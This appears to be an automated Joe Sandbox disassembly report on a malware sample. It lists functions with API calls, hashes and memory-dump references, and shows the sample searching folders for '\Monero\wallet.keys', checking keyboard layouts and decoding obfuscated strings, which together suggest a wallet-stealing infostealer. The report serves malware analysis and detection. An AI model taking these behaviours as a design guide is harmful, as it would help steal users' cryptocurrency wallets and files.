                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: e838217b818d2e94dc431aeeadcf76a95e39358598a53ad127bc9859ebdbe986
                              • Instruction ID: c2d940146f72473a4ea5eb12c0997fe03f15d8c804fffe78e40af58b9e28f6fd
                              • Opcode Fuzzy Hash: e838217b818d2e94dc431aeeadcf76a95e39358598a53ad127bc9859ebdbe986
                              • Instruction Fuzzy Hash: 17124E719111189BDB59FBA0CC96AEE737ABF14301F40429DB90A66091EF306F8DCFA5
                              Function 0064DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00660C2E), ref: 0064DE5E
                              • StrCmpCA.SHLWAPI(?,006614C8), ref: 0064DEAE
                              • StrCmpCA.SHLWAPI(?,006614CC), ref: 0064DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0064E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0064E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 36de6c2028cebc227188ab31c5da131c63b4d14eff2f73240be8486b4a349527
                              • Instruction ID: 79f608be46df9762fb2ba7a0cd91c9d20c4957377c76702e7370b128dc85c884
                              • Opcode Fuzzy Hash: 36de6c2028cebc227188ab31c5da131c63b4d14eff2f73240be8486b4a349527
                              • Instruction Fuzzy Hash: 03F190718151189ADB59FBA0CC95EEE737ABF14301F8042DDA80A62091EF306F8ECF55
                              Function 0064DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006614B0,00660C2A), ref: 0064DAEB
                              • StrCmpCA.SHLWAPI(?,006614B4), ref: 0064DB33
                              • StrCmpCA.SHLWAPI(?,006614B8), ref: 0064DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0064DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0064DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 43bc0b9c4dc68404ff9dfc36345246c70f7285bbfcbecdb5b738eddc884d5493
                              • Instruction ID: 49fa8dfb5cc30e6d458c9de124224862b02cf5fb8d8dc8eef83f3c2680f9c494
                              • Opcode Fuzzy Hash: 43bc0b9c4dc68404ff9dfc36345246c70f7285bbfcbecdb5b738eddc884d5493
                              • Instruction Fuzzy Hash: 699162729001049BDB54FBB0EC569ED777EAF88301F40866DFD0A96181EE349B0D8B96
                              Function 00A09A41 Relevance: 12.9, Strings: 9, Instructions: 1693COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $}?$(U\$1?w$:~n@$;VW$R'?G$reo_$Vo$[>
                              • API String ID: 0-3545384221
                              • Opcode ID: 28a73d0de069be78ab026618c167c3656d21c513187d31b2cd30d5db053c024c
                              • Instruction ID: f76be33c4ac418af641ec9fd438cfbc782f388552e6a5882af5d5ee0073bae05
                              • Opcode Fuzzy Hash: 28a73d0de069be78ab026618c167c3656d21c513187d31b2cd30d5db053c024c
                              • Instruction Fuzzy Hash: F5B22CF360C2049FE304BE2DEC8567AFBE9EB94720F16463DE6C4C7744EA3598058696
                              Function 00A155A1 Relevance: 11.7, Strings: 8, Instructions: 1702COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: +JP}$;wk$>j^~$n__s$r6[>${.$~@Zo$N{
                              • API String ID: 0-2004928298
                              • Opcode ID: 7e4b40676eabd92559af093d39cac265a45531968c899d428bdf043682f88879
                              • Instruction ID: 36ee9d2bdb58acf911b0fc45d740b3351266aa0757ef9490b97ed1ddd94cd78f
                              • Opcode Fuzzy Hash: 7e4b40676eabd92559af093d39cac265a45531968c899d428bdf043682f88879
                              • Instruction Fuzzy Hash: FAB25BF3A082049FE3046E2DEC8567ABBE9EBD4320F1A463DEAC4C3744E97558058697
                              Function 00657B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,006605AF), ref: 00657BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00657BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00657C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00657C62
                              • LocalFree.KERNEL32(00000000), ref: 00657D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: e00e6315fadfb00270080593d70117b134527e5a06b3937011063068e7dd7570
                              • Instruction ID: 48e6865030e43fd2c7f31c76c8a7b9c519048ecb246d8d0cd0fa44296d1454cd
                              • Opcode Fuzzy Hash: e00e6315fadfb00270080593d70117b134527e5a06b3937011063068e7dd7570
                              • Instruction Fuzzy Hash: 47417F71941218ABDB24DF94DC89BEEB379FF44701F2042D9E80962280DB342F89CFA5
                              Function 0064E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00660D73), ref: 0064E4A2
                              • StrCmpCA.SHLWAPI(?,006614F8), ref: 0064E4F2
                              • StrCmpCA.SHLWAPI(?,006614FC), ref: 0064E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0064EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 0b38b9256b65a9754f4abc4a488aef977bb6811567042b5d03e6c2109c4ae7d1
                              • Instruction ID: 699e5346b900cf0f02b348eb469e903e54662ff56203177b89e96bf4d1e31ff1
                              • Opcode Fuzzy Hash: 0b38b9256b65a9754f4abc4a488aef977bb6811567042b5d03e6c2109c4ae7d1
                              • Instruction Fuzzy Hash: 84123F719101189ADB58FBA0DC96EED737ABF54301F4042ADB90AA6091FF306F4DCB96
                              Function 00A0D02A Relevance: 9.1, Strings: 6, Instructions: 1630COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: =2%$ORw$`w$mo_$w==$'/~
                              • API String ID: 0-2222603712
                              • Opcode ID: 009641a9a739f931b2f3c5b84000d95c7f82fdedc8706b8b5a2754089b4ab6d7
                              • Instruction ID: 1b6f82830c3997968cf233e3f831d27cb3b48713cc56bceff284214bf8765b94
                              • Opcode Fuzzy Hash: 009641a9a739f931b2f3c5b84000d95c7f82fdedc8706b8b5a2754089b4ab6d7
                              • Instruction Fuzzy Hash: 8FB236F360C2049FE3046E29EC8567AFBE5EF94720F1A893DEAC5C3744EA3558058796
                              Function 00649AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nd,00000000,00000000), ref: 00649AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00644EEE,00000000,?), ref: 00649B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nd,00000000,00000000), ref: 00649B2A
                              • LocalFree.KERNEL32(?,?,?,?,00644EEE,00000000,?), ref: 00649B3F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID: Nd
                              • API String ID: 4291131564-3222557526
                              • Opcode ID: c66f75e49a02cfe5839a5ef9c1c233b297ac7f878bd1b31b05d820d8d19874c1
                              • Instruction ID: 04e72949c17458309812e508d5465314a73bc623f753411aece7c36b3bda8f30
                              • Opcode Fuzzy Hash: c66f75e49a02cfe5839a5ef9c1c233b297ac7f878bd1b31b05d820d8d19874c1
                              • Instruction Fuzzy Hash: AF11A2B4240208AFEB14CF64DC95FAA77B5FB89700F208059FA159B3D0C7B6A901CBA0
                              Function 00A06487 Relevance: 7.9, Strings: 5, Instructions: 1643COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 'p{$I%s{$frO>$gv;$w
                              • API String ID: 0-3016317580
                              • Opcode ID: 45192a7bd68ffc9b8b645bb031a9d0d7c51ab2ac583272eea453ec47af544d8d
                              • Instruction ID: ce88c6e4647c9b4d79c59f1225b9dc1952ae4a5c31b304c691d2a190b0ee560e
                              • Opcode Fuzzy Hash: 45192a7bd68ffc9b8b645bb031a9d0d7c51ab2ac583272eea453ec47af544d8d
                              • Instruction Fuzzy Hash: 74B23BF3A0C2109FE304AE2DEC8567ABBE9EBD4720F1A463DEAC4C7744E53558058693
                              Function 00A07FCF Relevance: 7.8, Strings: 5, Instructions: 1551COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: QB;$";s$$^]'$^%N$i:
                              • API String ID: 0-2810595
                              • Opcode ID: 0dd1ea09a176fe51b80d160169fdeaebd61242f1c9e4b766091b4556310bb57e
                              • Instruction ID: 1d372d944b0dea19b5e0fd301321eb9b488f36c7e92fffab81dd436064f8f7e4
                              • Opcode Fuzzy Hash: 0dd1ea09a176fe51b80d160169fdeaebd61242f1c9e4b766091b4556310bb57e
